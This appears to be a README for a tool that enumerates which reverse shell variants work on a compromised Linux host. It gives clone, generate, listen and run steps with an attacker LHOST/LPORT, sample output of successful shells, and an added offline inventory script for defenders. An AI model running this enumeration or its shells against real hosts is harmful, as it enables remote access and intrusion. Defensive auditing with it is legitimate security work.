Why?
You're a defender wanting to audit which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.
When?
You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.
How?
- Clone the repo:

```bash
git clone https://github.com/fx2301/reverseshellenum.git
cd reverseshellenum
```

- Generate yourself a fresh script:

```bash
LHOST="10.10.0.123" LPORT=31373 python3 generate.py
```

- Run the listener:

```bash
./listen.sh
```

- Run the reverse shell enumerator on the target host:

```bash
./reverseshellenum.sh
```

- Observe which shells work (refer to shells.json):

```
$ ./listen.sh
[i] Starting Reverse Shell Audit
[+] Success: Bash -i
[+] Success: Bash 196
[+] Success: Bash read line
[+] Success: Bash 5
[+] Success: ncat -e
[+] Success: Perl
[+] Success: Perl no sh
[+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
```

PRs welcome! Kudos to revshells.com for the raw material.
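As an added example (not part of the reverseshellenum project), here is a quieter companion check for the defender case: it inventories, on the host itself and without opening any connection, the interpreters and tools that the shell families in the sample output above rely on. The family-to-binary mapping is an assumption made for this example, not the contents of shells.json.

```sh
#!/bin/sh
# Added example, not reverseshellenum's own code: offline inventory of the
# binaries that the enumerated shell families depend on. Nothing connects out,
# so it produces none of the network noise of the full audit, and a minimal
# image can be checked before it ever reaches a network.

# Family:binary pairs. The four families come from the sample listener output;
# which binary each one needs is an assumption for this example, not shells.json.
RSE_DEFAULT_DEPS="Bash:bash ncat:ncat Perl:perl PHP:php"

# Exit 0 if the named binary (or builtin) resolves on PATH, 1 otherwise.
rse_has_bin() {
    command -v "$1" >/dev/null 2>&1
}

# Print one status line per family in the given space-separated dep list.
# $1 is intentionally unquoted in the loop so it splits into pairs.
# Usage: rse_inventory "Bash:bash Perl:perl"
rse_inventory() {
    for pair in $1; do
        fam=${pair%%:*}
        bin=${pair#*:}
        if rse_has_bin "$bin"; then
            echo "[+] available: $fam ($bin)"
        else
            echo "[-] missing:   $fam ($bin)"
        fi
    done
}

# Echo how many families in the dep list have their binary present.
rse_count_available() {
    n=0
    for pair in $1; do
        rse_has_bin "${pair#*:}" && n=$((n + 1))
    done
    echo "$n"
}

# Run against the default list when executed directly.
rse_inventory "$RSE_DEFAULT_DEPS"
echo "[i] $(rse_count_available "$RSE_DEFAULT_DEPS") of 4 families have their binary present"
```

A family reported as missing cannot be used as-is by the corresponding entry, which makes the list a starting point for stripping interpreters from images that do not need them.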